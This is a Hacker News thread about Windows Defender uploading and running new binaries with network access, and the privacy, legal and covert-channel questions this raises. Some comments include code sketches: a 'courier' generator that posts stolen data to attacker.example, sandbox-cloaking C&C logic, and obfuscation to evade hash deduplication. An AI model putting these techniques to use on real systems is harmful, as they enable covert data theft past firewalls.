My application ran away and called home from Redmond (medium.com)
496 points by jviide 8 days ago | 138 comments





I think the key quote here is

"This opens interesting data leak vector for attacker and also includes some privacy concerns. It is quite common that even in isolated environments, many of the Microsoft IP address ranges are whitelisted to make sure systems will stay up to date. This enables adversary to leak data via Microsoft services which is extremely juicy covert channel."

As a user, you can just disable automatic sample submission. In fact, I'm pretty sure you can set it during installation: I've never had to go through the settings to disable it, yet it's disabled on all my installations.

But the question is, from an adversary perspective, does your victim have it disabled?

Most likely they won't, so you can use Microsoft as a mule to exfiltrate data from otherwise firewalled victims.


> you can use Microsoft as a mule to exfiltrate data from otherwise firewalled victims

This is actually a smart idea. Make your spyware collect & encrypt data into a (new and unknown) binary and execute it, relying on the fact that Microsoft will exfiltrate it for you. When that binary itself is run (within MS' premises) it will then reach out to you with its embedded data.
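A minimal sketch of that courier idea in Python, standing in for a compiled dropper (the URL and payload here are invented for illustration):

```python
import base64
import textwrap

def build_courier(stolen: bytes, home_url: str) -> str:
    """Emit source for a standalone 'courier' program that carries the
    stolen data inside itself and phones home when anyone runs it,
    including an anti-malware sandbox with network access."""
    blob = base64.b64encode(stolen).decode()
    return textwrap.dedent(f"""\
        import base64, urllib.request
        PAYLOAD = base64.b64decode("{blob}")
        # If the AV vendor uploads and executes this binary, the
        # sandbox's own connectivity delivers the data for us.
        urllib.request.urlopen("{home_url}", data=PAYLOAD)
        """)

courier_src = build_courier(b"secret config dump", "https://attacker.example/drop")
```

The attacker never needs their own outbound channel from the victim; merely executing the freshly generated (and therefore never-before-seen) binary is enough to get it submitted.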


And it all slips through the firewalls and whitelists because it looks just like official "Microsoft Telemetry" data. Wow.

Free data uploads. You could make unique binaries that when run start seeding a torrent. Maybe MS will put the kibosh on you uploading Seinfeld_S1_E1_obfuscated.exe to their cloud, but... how about a worm serving up its own updates through MS IPs?

Yet another reason I'm reluctant to upgrade to Windows 10. Too many buttons and toggles to turn off to arrive at a PC that functions the way I expect it to, and an update mechanism that's likely turning new ones on faster than I can spot them.

This is a Windows Defender thing, not a Windows 10 thing.

Windows Defender on Windows 7 also submits previously unobserved binaries to Microsoft for the same reason.

Go ahead, blame Win10, though. A non-zero number of people will take your comment to heart and believe, with their entire soul, that you knew what you were talking about, without ever seeing my comment.

I am so tired of seeing communal ignorance on this topic. People believe whatever bullshit they want, if it fits the narrative they are trying to sell.


You're splitting hairs on semantics. However you slice it, the software is present after a fresh OS installation, with a default setting that broadcasts my files to Microsoft.

Since you brought up Windows 7, I'll point out in those days Microsoft had the decency to inherit the setting from a choice made during OS installation (but even then you had to dig a little to discern the connection): https://i.imgur.com/SpqXmod.png. You further had to visit a SpyNet enrollment screen before it collected more "advanced" metadata like filenames, location, etc: https://i.imgur.com/z3qtuxp.png

On Windows 10, even if you turn off ALL three pages of privacy-hostile options during installation: https://i.imgur.com/RjXSM6S.png

...you still wind up with a Defender that broadcasts your files: https://i.imgur.com/1M7z3nH.png

Incidentally, the Privacy Policy links in that screenshot all just forward to the generic Microsoft one (https://privacy.microsoft.com/en-US/privacystatement), so who even knows what additional metadata each feature sucks up.

This is what I'm talking about when I complain about all the buttons and toggles to turn off just to get my OS to function the way I expect (in this case, stop indiscriminately bleeding my bits and bytes to the cloud).


They aren't indiscriminately doing anything. Only executables with hashes not previously seen are sent by default, and clearly you know how to turn that off.

They're legally bound by their privacy policy. They can't use info obtained by those executables to blackmail you or turn you in to authorities; they can only use that data to improve the anti-malware service they offer. And, as previously mentioned, you know how to turn it off.

The information about this isn't hidden. An operating system is complex, and thus operating system configuration is likely to be complex. Microsoft could have made things easier to find, you're right, but they base their defaults on the vast majority of people, like me, who are completely fine with doing what we can to improve their anti-malware service.

You're angry and that's fine.

Imagine the anger (and the fallout) if yet another malware worm used Windows to propagate across the world. People were absolutely LIVID last time, and there were lots of lawsuits against Microsoft for ILOVEYOU and Code Red and others of the era. The default settings you see today are a direct result of those events and other, smaller ones, like them.


>This is a Windows Defender thing, not a Windows 10 thing.

So Windows Defender isn't bundled as a part of Windows 10?


> So Windows Defender isn't bundled as a part of Windows 10?

It was also bundled as part of Windows 8.1, Windows 8, Windows 7, and Windows Vista on top of being available as a free download for Windows XP (and even 2000 during the beta phase).

The current form, after the Microsoft Security Essentials package was merged in, didn't come about until Windows 8 but Windows Defender as a product dates back to Microsoft's purchase of GIANT Software.

Whichever date you pick, XP or 8, saying Defender is a Windows 10 thing is like saying Firefox is an Ubuntu 19.04 thing. Sure, Ubuntu 19.04 bundles Firefox, but so did many versions prior.

---

It's also worth noting that almost every antimalware product has an option to submit unknown binaries for analysis, and almost every one of those either enables it by default or very strongly suggests that you do so during setup to the point that I'd imagine most installations that aren't managed under corporate policy are submitting samples.


Sure. But Windows users often installed it on Windows 7. And on Windows XP, as I recall.

Also, other anti-malware apps typically upload novel binaries. And their test machines likely run them, with network access, for the same reasons that Microsoft does.

So this exfiltration channel may well have existed for decades. Whether it's been used or not is an open question, though.

Edit: style


I'm a Windows 10 user; I switched back after a decade of macOS, and I've been really satisfied with it. It's a huge step forward from Windows 7/8.

Seems nuts that they'd just randomly run every binary that comes to them in a crash report.

I don't think that this is about crash reports.

Windows Defender, like many anti-malware apps, checks hashes of binaries. Anything that's new gets uploaded for testing.
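In rough pseudocode, the client-side novelty check works something like this (a sketch of the general AV pattern, not Defender's actual implementation):

```python
import hashlib

def should_submit(binary: bytes, seen_hashes: set) -> bool:
    """Hash the executable; only a never-before-seen hash triggers
    automatic sample submission for cloud analysis."""
    digest = hashlib.sha256(binary).hexdigest()
    if digest in seen_hashes:
        return False              # known file: verdict is cached
    seen_hashes.add(digest)       # first sighting anywhere: upload it
    return True

seen = set()
fresh_build = b"MZ\x90\x00...just compiled, unique hash"
assert should_submit(fresh_build, seen)        # novel: gets uploaded
assert not should_submit(fresh_build, seen)    # second run: already known
```

This is also why every local build you compile looks "new" to the cloud: even trivial source changes produce a hash nobody has ever seen.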


Here's another thought. Could you use this to instead _attack_ someone from Microsoft's IP range?

Maybe not DDoS, but if the range is naively whitelisted, maybe something more precise due to the fact that the victim believes the environment to be isolated.


Hopefully MS blocks their sandboxes from contacting well-known ports (< 1024), so it would be difficult to attack common services, but who knows?

Based on the article, it seems low ports work: the Beacon called home over port 20.

Also, in the image caption ...

> Because of Windows Defender automatic sample submission, Beacon binary was uploaded to Redmond and Beacon called Home from there.

... and below ...

> They run the executable in an environment where network connectivity is available.

Why would they do that? To see what happens?

And it's not just Microsoft. Many anti-malware apps (now, probably most) upload binaries. And I'm guessing that many run them. Maybe even with network access.

SensorFu might want to repeat this test using other anti-malware apps.


Consider: malware that doesn't do anything suspicious unless it can first fetch a plausibly benign file from what looks like a CDN. If the goal is to properly inspect the behaviour of potentially malicious code, what it does after successfully fetching a set of ads is as important as, if not more important than, what it does when the connection is blocked. Perhaps a multiplayer game with a backdoor triggered by the MotD service, through string-processing code that is intentionally vulnerable to buffer overflows.

For bonus points, the C&C server realises the incoming IP has Microsoft's name attached, and only sends back the adverts. For anyone else, it sends a malicious image file as part of the drop, which exploits an intentional security vulnerability in the dropper...
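A sketch of that server-side cloaking, keying off the client's reverse DNS (the domain list and payloads are invented; real C&C software might fingerprint by IP range, latency, or sandbox artifacts instead):

```python
def payload_for(reverse_dns: str) -> bytes:
    """C&C server: hand suspected analysis sandboxes the benign decoy,
    and everyone else the real drop."""
    analyst_domains = (".microsoft.com", ".msn.com")  # assumed AV networks
    if reverse_dns.endswith(analyst_domains):
        return b"<just adverts>"
    return b"<image exploiting the dropper's intentional bug>"

assert payload_for("sandbox-07.microsoft.com") == b"<just adverts>"
assert payload_for("victim.example.net").startswith(b"<image")
```

From the sandbox's point of view, the binary then behaves exactly like harmless adware every single time it is tested.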

That's actually disturbingly sneaky.


OK, that makes sense.

So how would one block this exploit? You can't test the malware properly without letting it reach its servers. So then you're also letting it upload its exfiltrated data. Which would likely be encrypted.


I think you'd more or less have to block *.microsoft.com at the gateway, then add explicit allows for WGA and Windows Update.

Or a Group Policy change (or, e.g., PowerShell's Set-MpPreference -SubmitSamplesConsent) to tell Defender not to upload samples to MS.


Sorry. I meant how would Microsoft (and other anti-malware) firms block it. When they're testing binaries obtained from users' machines.

For users, sure, try to lock down Windows. Or (my preference) just don't use it. Or don't give it network access, if it contains any information that you care about.


> But the question is, from an adversary perspective, does your victim have it disabled?

Does it even matter? Extrapolating from that quote: a submitted sample could make abusive network requests against the victim (from MSFT's network, which is "trusted"), as well as network requests back to the attacker's server for control and/or data collection.


>As a user, you can just disable automatic sample submission.

I don't think disabling it really helps. It sounds like the goal is to prevent malware on your machine from ever leaking data on your machine to some external server. But even if you disable automatic sample submission, the malware on your machine could still submit a program on its own to Microsoft that leaks your data.


I think the key is that Windows 10 sends all new binaries to Microsoft by default. This is a total security and privacy (they're the same thing) nightmare.

From a copyright law perspective, this seems wild. Microsoft is downloading and running binaries from entities that may have never given Microsoft license to do so, including Microsoft's competitors. All based on a permission setting configured by an unrelated third party (the user).

> never given Microsoft license to do so

It's possible that they don't need it. There are fair use exemptions for reverse engineering and automated analysis. These may be the legal basis on which anti-malware research can be conducted.


Indeed, there have to be exceptions like this. Otherwise malware authors could sue AV companies for infringement, which doesn't seem to fit the intention of IP law.

> Otherwise malware authors could sue AV companies for infringement, which doesn't seem to fit the intention of IP law.

'You may sue the AV company for $1 million; users who suffered from your malware will civilly sue for $100 billion, and the government will charge you with crimes and put you away for a decade. Your move.'


A tangent:

There's this fascinating (to me, anyway) line between "viruses" (including worms, Trojans, and similar malware) that antivirus programs will tackle, and adware/spyware that they usually don't.

The difference between the two is whether or not there's a corporation publicly taking credit for the program and suing antivirus companies for defamation over calling it a "virus".

Adware/spyware is limited in distribution methods and payload types by the letter of the law, but otherwise the two classes are functionally identical.


I believe fair use only applies to software that you legally acquired.

If Microsoft copies an application from my computer without asking, then it did not legally acquire it.

Malware is a different case: malware entered my computer with the permission of the malware creator. I didn't steal it from them; it came to me willingly. Hence I am allowed to analyze it, and I am allowed to delegate that task to someone else.


Yes, but who’s to say it came to your machine under such circumstances?

Microsoft is the one that has to prove it has a valid license, not the other way around.

Let Microsoft deal with VirtualBox license claims from Oracle.

But until there is a court case with specific facts, that is very much a hope and a prayer by Microsoft. It is, indeed, a risk they are taking.

Indeed the ENTIRE basis of the EULA is that the user copies the software by executing it, whereupon a copy exists both on-disk and in-memory. This is long settled jurisprudence. I’m sure that if Microsoft downloads and runs an AGPL-licensed work they expose themselves to pretty severe problems.

I'm pretty sure that for most home users who are also administrators of their computers, a setting pops up asking if you consent for telemetry to be collected.

I'm not sure if an appropriate warning or option is given for third-party users of a computer, or if it is required for administrators to warn third-party users as such.


> that may have never given Microsoft license to do so

I'm willing to bet it is in the license agreement for Windows and Windows Defender, so you have likely allowed Microsoft to do this.


Just because I have a license to run a program does not mean I have a license to sub-license it to Microsoft.

There is also the issue that MS would have been given the copy by someone who did not have rights to distribute it, so the infringement is with the user.

You didn't explain what this has to do with copyright. The CFAA[0] (or even [1]) seems like a better avenue to explore, but still likely a dead end. Copyright seems like the wrong frame here.

[0] https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act

[1] https://en.wikipedia.org/wiki/Economic_Espionage_Act_of_1996


Software is covered by copyright; if I write some program and compile it, and they copy it off my machine behind my back to run somewhere, it is copyright violation, is it not?

Copyright infringement. It is unlikely to apply. Particularly as the infringement has no "effect [...] upon the potential market for or value of the copyrighted work." Meaning Microsoft hasn't hurt anyone else's bottom line.

There are several fair use arguments you can make, at least three strong ones. But to be honest this would need to be tested in the courts one way or the other.

I don't really think copyright conceptually is a very fruitful argument here. CFAA is likely stronger.


> Meaning Microsoft hasn't hurt anyone else's bottom line.

How so? Microsoft spent money implementing this copying, so the copy is clearly of value to them. Why shouldn't they pay for it?


Fair. I wonder how a combo of CFAA, HIPAA and GDPR could fare here. I couldn't find whether Windows Defender automatically uploads all executables it sees, but apparently[0] non-executables deemed "suspicious" can be uploaded too.

--

[0] - https://www.reddit.com/r/Windows10/comments/8dmqdy/windows_d...


Worth noting Fair Use in Copyright is a USA thing.

In UK there have been some changes to Fair Dealing in the last couple of years that I'm not up to date on, but I don't know of anything that would make this allowed except having an explicit license from the copyright holder.


HIPAA would land on you, not them. Users of Windows are required to turn that setting off if you're in HIPAA land, among probably a hundred other things.

The License you agreed to by using Windows probably covers this explicitly, even if they didn't get covered under the explicit exception for reverse-engineering and automated analysis.

Even if I were to, hypothetically, cross-compile from Linux to Windows and deny my user the right to give away software written by me?

Pretty sure by you having this malware submission feature enabled you have given a limited license for them to execute the binary. You're barking up the wrong tree.

You (the user) may not have the right to grant such a license.

Assume for a second this is correct. What's to stop virus writers from embedding a ToS preventing Microsoft from running the code?

I'm not saying you're wrong, I'm saying it's really hard to work out how this is meant to work.


I don't think a virus is relevant here. I'm not a lawyer, but the idea of a "terms of service" for an unwanted and maliciously installed executable seems nonsensical. Virus authors can include whatever TOS they want, but the "user" hasn't agreed to the TOS practically by definition.

Unfortunately, the law doesn't arrive at common-sense answers like that as easily as you and I do.

Good point. What about antivirus or cloud-detonation services? Sounds like there would be similar challenges with those regarding licenses?

Perhaps. It seems that this option is enabled by default, though. I imagine something about this is buried in the pile of agreements you have to click through when installing Windows. What's the status of current legal understanding of the reality that EULAs are bullshit and nobody ever reads them? Maybe I could win something from Europe via GDPR complaint if I compiled an executable containing my PII only for it to be exfilled by Microsoft?

If this is Microsoft's idea of performing a security function, I have to assume that submitted executables are also going into a giant database/archive that can be turned over to the three-letter agencies with a single National Security Letter, complete with any secrets embedded therein.

Like Bo Burnham says, I guess I should lower my expectations a lot.


It's already happening.[0]

Marketplace Hansa was running Bitdefender, which pwned them to Europol.

> Europol has been supporting the investigation of criminal marketplaces on the Dark Web for a number of years. With the help of Bitdefender, an internet security company advising Europol's European Cybercrime Centre (EC3), Europol provided Dutch authorities with an investigation lead into Hansa in 2016. Subsequent enquiries located the Hansa market infrastructure in the Netherlands, with follow-up investigations by the Dutch police leading to the arrest of its two administrators in Germany and the seizure of servers in the Netherlands, Germany and Lithuania. Europol and partner agencies in those countries supported the Dutch National Police to take over the Hansa marketplace on 20 June 2017 under Dutch judicial authorisation, facilitating the covert monitoring of criminal activities on the platform until it was shut down today, 20 July 2017. In the past few weeks, the Dutch Police collected valuable information on high value targets and delivery addresses for a large number of orders. Some 10 000 foreign addresses of Hansa market buyers were passed on to Europol.

0) https://www.europol.europa.eu/newsroom/news/massive-blow-to-...


Haha, it's always great to see a Bo Burnham reference in the wild. He said that about love, though. Not... Microsoft.

That's frankly alarming. They should be doing nothing but static analysis on those binaries and if they must execute them, then certainly not giving them any network access. That's without even touching on any IP law concerns and how an end user can be unwillingly complicit in such things...

Malware will pull updates and commands from the internet; if they didn't allow network access, the service would be nearly useless. Attackers can make the pre-update binary look as innocent as they want.

I can understand why people are saying that network access is necessary for meaningful execution, given how much malware conditions on it. (For instance, WannaCry's kill switch.) But it's still hair-raising from a developer's standpoint since network actions you expected to control are now triggering unexpectedly. I can think of a few ways for that to get ugly.

In this case Beacon was sandboxed for security observation, but a build could easily be sandboxed for network-unsafe testing instead. Perhaps it's issuing malformed or high-volume requests to test internal functionality, safe in the knowledge that it's not actually connected to anything, and so it becomes a DoS attack when it's launched in the wild.

Or worse, maybe it's calling home to an endpoint that does something when it gets the call. It's not hard to imagine somebody putting together a binary with any required auth baked in on the logic "this only exists on my machine", and then suddenly getting it called from Redmond as well. Best practices ought to handle that alright, but it's still an awfully surprising thing to have happen to your test build.


Malware often checks whether it has internet access and doesn't activate if it doesn't, to keep it from running in a test environment.

Cool, it's kind of like STUN, but for networks with almost no connectivity.

Create a binary that sends info when started, submit it and wait for it to send the info from Redmond to your server.

Too bad there is no return channel or you could make IP over windows update.


Can you return a bit by deciding whether the executable gets flagged as malicious in response to the network activity? Can you set up a timing difference to send more than one bit per executable?
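With only "did it beacon or not" as a signal, you could still move arbitrary data by spending one unique executable per bit, a back-of-the-envelope sketch (throughput would be dreadful, and the bit ordering here is invented):

```python
def to_bits(message: bytes) -> list:
    """Each bit becomes one unique submitted executable:
    beaconing == 1, staying silent == 0 (LSB first within each byte)."""
    return [(byte >> i) & 1 for byte in message for i in range(8)]

def from_bits(bits: list) -> bytes:
    """Home end: reassemble the observed beacon/no-beacon pattern."""
    out = bytearray()
    for i in range(0, len(bits), 8):
        out.append(sum(bit << j for j, bit in enumerate(bits[i:i + 8])))
    return bytes(out)

assert from_bits(to_bits(b"hi")) == b"hi"   # 16 unique executables for 2 bytes
```

A timing channel (how long before the beacon fires, or which port it hits) could pack several bits into each executable instead of one.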

Could you do ssh -R and get a shell on the testing machine in Redmond? Could make a nice tunnel for getting US Netflix.

I was thinking of doing some folding at home via this mechanism.

You could use it for crypto mining.

Assuming they only run it once, in one sandbox, that would probably not be particularly profitable.

Especially if there's a time limit on execution.

How many bitcoins can you mine in 30 seconds with a silly-low CPU cap?


> How many bitcoins can you mine in 30 seconds with a silly-low CPU cap?

Somewhere in the region of $5e-9 worth of bitcoins.


Or launch ddos on a third party with a series of unique executables.

Advanced Threat Protection in Office 365 does this as well. It's a security feature that scans all linked files and attachments sent through Outlook.

A while back in my company we were deploying a client management tool (think TeamViewer but with more background management and software deployment capabilities). It needed to be very easy to install, so we just had a link to an EXE file that needed to be opened by our on-site IT departments. No extra steps were required.

Imagine our surprise when we suddenly saw machines popping up that were totally unfamiliar. These were machines connecting from a Microsoft IP, and all had random (but similarly formatted) usernames. They also provided random mouse inputs. We could even take control of these machines (!) but apparently they were short lived VMs that only existed for a few minutes before being recycled.

I contacted Microsoft support because at first we thought this may be a manual process (because of the mouse inputs and the user names), and we didn't want Microsoft employees seeing user data. Afterwards I also commented to the support person that someone may use these temporary machines as an attack vector (to use as an anonymous source, or in a DDoS attack), but the ticket was closed and if I recall correctly this was deemed "working as designed".


Any time somebody here claims that the 'new' Microsoft is so much better and more moral than the 'old' one, I want to punch them in the face and start ranting about Windows 10. I've never met a single person, IT or not, who would not complain about it after moving from Windows 7.

Now I don't have to, I can just point to this thread and this comment.

This is pure arrogance: they know they have the whole corporate world stuck with Office; even an immediate move to open source would take 20 years, mostly due to tight Excel integration and expertise. We would all benefit from good competition in this area...


One of the main reasons we don't want anything to do with most recent Microsoft software at my office is concern that unspecified data we're working with -- which might include information obtained under NDAs, clients' trade secrets, sometimes personal data, etc. -- might get sent up to the mothership when one of the telemetry systems phones home.

People look at us as if we're crazy for worrying about this possibility, even though the Microsoft of 2019 is notoriously vague about how any of this works and we could be flagrantly violating multiple laws and contractual obligations if it happened.


This. If they were at least up-front and said what it collects, how, when, and how to turn it off (or, better yet, followed privacy best practice and made it an informed opt-in), I'd be more eager to upgrade.

With that said -- there's still room for due diligence. I've built systems which handle personal data, and we pretty much started with Debian minimal and worked from there. To make damn sure, we stuck them behind a whitelisted firewall. They had access only to things we allowed them to see, and only in the direction we allowed.


If only it were just Microsoft... it also goes for Intel and Ryzen-era AMD processors. Maybe IBM's new PowerPCs are safe?

"Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default."

Even if you're developing? Even if you're developing proprietary applications not for public use?

All your code are belong to us.


I mean, it's either send all or send none; there's not really an in-between with this method.

> Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default.

Interestingly, Apple's now doing sort of the opposite of this. Instead of having the end-user's computer upload all executables to Apple for analysis, Apple requires the developer send them over and have them "notarized" before they run.


Reminds me of the story about the NSA contractor who had pirated Office on his laptop; when Kaspersky AV predictably uploaded a sample of the virus-infected keygen to its servers, the US tried to spin it as "Russian data exfiltration".

My recollection was that he had samples of NSA malware on his computer, that Kaspersky detected this, and that shortly afterwards he was directly targeted by Russian state hackers.

It was not so much that Kaspersky was acting as malware, but that they were sending tips to the FSB.


Oh, yeah, I remember that one!

> Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default. They run the executable in an environment where network connectivity is available.

How did the author reach this conclusion? Is it documented somewhere?


He includes this screenshot[0], addressing the "send" part. The "run" part seems evident from the network traffic coming from MSFT.

[0] https://miro.medium.com/max/334/0*g_3L3SxR4IYoBAxD


>Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default.

Wait, what? Let's say you write code that you compile using MSVC or MinGW or whatever to an .exe file.

Surely there is no way this gets automatically sent to MS?


That is exactly what happens, and it happens with any new executable. I noticed it when I was trying out how well Rust works on Windows.

Seems bizarre. If I build 30 .NET binaries a day while building and testing a new feature, I guess all 30 get uploaded to MS and tested. And the same for all of the other developers doing the same sort of thing around the world. I wonder how often their test cluster goes down in flames while some C++ developer somewhere is trying to fix a memory access bug.

I couldn't even get Rust to install on Windows!

rustup is your friend. Install that, and then Rust with rustup.

Edit: forgot link: https://rustup.rs/


What did you run into? Did you file a bug? That’d be helpful! I use Rust on Windows every day, though that means I’m not often re-installing it...

Yes, you can test this yourself: compile a 50MB binary and watch your bandwidth for a bit after attempting to run it.
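Even rebuilding identical source usually yields a new hash (embedded timestamps and the like), but you can force it. A sketch of generating a guaranteed-unique test artifact (the pad layout is arbitrary):

```python
import hashlib
import os

def unique_build(base_image: bytes) -> bytes:
    """Append a random pad so every 'build' hashes differently,
    i.e. looks brand new to hash-based sample submission."""
    return base_image + b"\x00PADDING\x00" + os.urandom(16)

a = unique_build(b"MZ...same source, same compiler flags")
b = unique_build(b"MZ...same source, same compiler flags")
assert hashlib.sha256(a).digest() != hashlib.sha256(b).digest()
```

Pair that with a packet capture on the gateway and you can watch the upload happen for each "new" file.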

I believe macOS 10.15 also does this, because there's a massive delay the first time I run a binary compiled with clang.


> They run the executable in an environment where network connectivity is available.

Why does MS run unknown executables? On the other hand, should be a nice DDoS provider for blackhats...


I'm sure Microsoft is keeping a very close eye on what the binaries are actually doing: run them in a virtual environment, see what they do to the environment and what internet communications they make, and when it's done, destroy the environment.

If it tried to do something like a DDoS it would be identified as doing so and marked as malware, end of test.


> I'm sure Microsoft is keeping a very close eye on what they are actually doing.

This seems like a questionable assumption. Microsoft is in the media for being "better" these days, but doing this at all seems like bad judgement. MSFT has the lawyers to win a fair use case, I'll agree to that, but large corporations don't have much incentive to minimize negative externalities, because they have the lawyers, and the money for lawyers.


Oh c'mon. Microsoft takes security seriously and is genuinely trying to make sure Windows users aren't plagued with malware. And internally, Microsoft has a good track record of not having data breaches.

Even with utter cynicism, "Microsoft hosts DoS attack on Apple" is such a disastrous headline that it's well worth avoiding, and that's before getting into any liability for botching something like this.

Perhaps it's not running the EXE but instead identifying URLs in the code, cURLing them to see what it gets, and doing so to verify what they get isn't malware?

The software in question (called Beacon) is designed to call home. The binary has built-in cryptographic keys and sends its traffic encrypted. The receiving end, called Home, receives these packets, decrypts them, verifies the sender, and then raises an alert.

The exe must have been run to be able to generate the proper encrypted payload and send it to the right place; in this case, ports 20 and 1025 over TCP.

Disclaimer: I am one of the people who wrote the software.
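SensorFu hasn't published Beacon's wire format, but the verify-the-sender step described above can be sketched with a keyed MAC (the key handling, lengths, and packet layout here are invented for illustration):

```python
import hashlib
import hmac
import os

KEY = os.urandom(32)          # shared secret, baked in at build time
NONCE_LEN, ID_LEN = 16, 8     # assumed packet layout

def beacon_packet(key: bytes, host_id: bytes) -> bytes:
    """Beacon side: authenticate (nonce, host_id) so Home can trust it."""
    nonce = os.urandom(NONCE_LEN)
    tag = hmac.new(key, nonce + host_id, hashlib.sha256).digest()
    return nonce + host_id + tag

def home_accepts(key: bytes, packet: bytes) -> bool:
    """Home side: recompute the tag and alert only on a valid sender."""
    nonce = packet[:NONCE_LEN]
    host_id = packet[NONCE_LEN:NONCE_LEN + ID_LEN]
    tag = packet[NONCE_LEN + ID_LEN:]
    expect = hmac.new(key, nonce + host_id, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expect)

pkt = beacon_packet(KEY, b"host0001")
assert home_accepts(KEY, pkt)                 # genuine Beacon
assert not home_accepts(os.urandom(32), pkt)  # wrong key: rejected
```

The point of the authentication is exactly what made this finding credible: a forged or replayed packet can't produce a valid alert, so a call from a Microsoft IP really did come from the uploaded binary being executed.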


String obfuscation is trivial, so I have a feeling they have to actually run the binaries to learn anything. Just a feeling, though; I don't think the author of the post stuck around long enough to see whether the remote instance behaved as it should.

Maybe not DDoS (I doubt MS gives that service much throughput), but if you want to get past someone's firewall rules, then, as the author points out, people may whitelist those particular IPs.

I was interested in this Beacon software, but then I found you had to contact them for pricing and I gave up on the idea.

Lesson: clear pricing keeps people like me in the game


I've found a lot more software startups and SaaS companies using this method lately.

When I actually am interested enough to talk to their salespeople (and they're straightforward enough with me) they've told me it helps them target whales more easily.

They can charge a lot more to a huge Enterprise and adjust lower for SMBs.


Of course the fun part of that is when the sales staff mistake a minnow for a whale.

Case in point: a large FTSE, NYSE, or NASDAQ-listed company with largely siloed internal departments, all with their own budgets. Your yearly budget might be $20,000, but they see the Inc. or Plc. with a turnover in the hundreds of millions and quote accordingly...

That situation makes for some fun sales calls.


I'm the same! I like to plan things, so if something doesn't allow me to fit it into my plan easily I will discard it as not an option.

Unknown costs, talking to other people, negotiating; these things produce trace amounts of anxiety. Anxiety I'd rather not deal with. A simple Pricing page solves this.

I'd rather spend an hour googling your competitors than contact someone for a quote.


If the price is not on the website, it is either:

(1) 'Enterprise' oriented software, in which case it is too expensive for you anyway (those long, high-touch sales cycles, negotiations and commissions have to be recouped somehow)

(2) Not actually a product, but a Trojan horse to sell you lots of consulting and bespoke development services.


It would be a fun experiment to create a network probe executable that exfiltrates results back to you, and then push it to Microsoft in this way. I wonder how secure their test environment could be if it has Internet access...

I'd imagine the app is run in a DMZ and the internet firewall blocks typical malware behavior once detected. After all, the whole point of running it is to find out whether the executable does these kinds of things, so they'd be prepared.

> Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default.

That's not only a privacy concern; it's blatant copyright infringement.


I'm surprised by the number of people on HN who assume that Microsoft's security group, whose job is to find malware by running unknown programs, takes absolutely zero precautions against one of those programs being malicious.

Microsoft does not exactly have the best track record with this.

https://bugs.chromium.org/p/project-zero/issues/detail?id=12...


In what way is "had an RCE CVE" evidence that Microsoft's security group, which actively tries to find malware by running unknown programs, takes absolutely zero precautions against one of those programs being malicious?

I'm not talking about invulnerable software; I'm talking about the comments assuming Microsoft doesn't expect __malware testing servers__ to run scanning or DDoS malware.


Depends on the definition of "malicious". Breaking hard drives and other hardware like in the good ol' days, or attacking other Microsoft servers? I agree, totally their problem. This is a proof of concept of phoning home though, possibly to exfiltrate data, via Microsoft servers and IP ranges!

It looks like you can manually upload submissions here:

https://www.microsoft.com/en-us/wdsi/filesubmission

This may be outdated, but you can also configure Defender to always prompt before sending:

https://docs.microsoft.com/en-us/windows/security/threat-pro...

It would be interesting to set it to always prompt and see what triggers it. There must be some level of fingerprinting done on the client (hash of the binary? network activity, etc.) that can be used to compare against known threats.
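Whatever Defender actually checks before uploading, a plausible first-pass fingerprint is just a cryptographic hash of the file compared against a known-sample set, which would also explain why identical copies of a binary wouldn't be re-analyzed. A toy version (all names invented):

```python
import hashlib

def file_sha256(path: str) -> str:
    """Hash a binary in chunks so large files don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def is_known(path: str, known_hashes: set) -> bool:
    """Skip the upload if the cloud has already seen this exact binary."""
    return file_sha256(path) in known_hashes
```

Of course a hash only catches byte-identical samples, which is exactly why "new unique binaries" get shipped off for dynamic analysis.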


This shouldn't be hard to test.

Just create a native executable in your language of choice that connects to a hardcoded address of a server you have access to and try executing it on a windows machine with sample submission enabled.


Also seems like a viable vector to DOS something - if Microsoft runs this on some sort of cloud infra with a fat pipe

I think that's less likely, if MS gets a thousand identical copies of a binary, they probably aren't going to bother test-analyzing more than one. There also might be some rate-limiting on what they'll do from a particular machine.

So your attack might require first controlling a swarm of Windows 10 machines, in which case you might as well do it directly :P


Who said anything about identical binaries? It's trivial to make two completely differently obfuscated binaries that do the same thing. If it were possible to determine behavior by static analysis, they wouldn't need to run it...
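As a toy illustration of why hash-based dedup doesn't help here: XOR-encoding a payload with a fresh random key produces different bytes on every "build" while decoding to identical behavior at run time (sketch, names invented):

```python
import os

def obfuscate(payload: bytes) -> bytes:
    """Prepend a fresh one-time key; every build gets unique bytes."""
    key = os.urandom(len(payload))
    body = bytes(p ^ k for p, k in zip(payload, key))
    return key + body

def deobfuscate(blob: bytes) -> bytes:
    """Recover the original payload at run time."""
    half = len(blob) // 2
    key, body = blob[:half], blob[half:]
    return bytes(b ^ k for b, k in zip(body, key))
```

Real malware packers do the same thing to whole executables, which is why static signatures force the analysts into dynamic execution in the first place.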

My first thought was this leading to DoS, even accidental ones.

If you're testing that your binary builds requests properly, maybe you've got it making them as fast as possible and you're running it without network permissions. Fine, until it suddenly runs with full network access and hammers whatever service you're pointing at.


Ok, so if I compile an executable that pops up a screen with a picture I drew + lots of personal and medical information about me, and phones me whenever it's executed, and then just leave it on my machine only for it to phone home from Redmond, can I sue them for copyright, GDPR, HIPAA violations and whatnot? How good is their "new unique binaries" detection? Could I do the same with just a bunch of files wrapped in a good ol' self-extracting archive?

Seriously, what in hell? Like always, blatant violations of users in the name of "security".


I'm not sure how you would invoke HIPAA with no medical professionals involved. It doesn't just magically apply because you wrote down your own medical information.

There seems to be a widespread misconception that any health information is always covered by HIPAA, when in reality it only applies to protected health information held by covered entities. There also seems to be a lot of confusion about what counts as a violation: as far as I know, only covered entities can be liable, not people they wrongly pass information on to.

Now, if a covered medical software company accidentally let a build with accessible PHI go to Microsoft, I guess it's possible they could be HIPAA liable. But that's a pretty narrow case, and not one that's a threat to Microsoft.


> not one that's a threat to Microsoft

Until the medical software company sues Microsoft for damages to recoup the HIPAA fine. This is probably buried in some clickwrap contract though. (IANAL; not sure how enforceable such a contract would be)


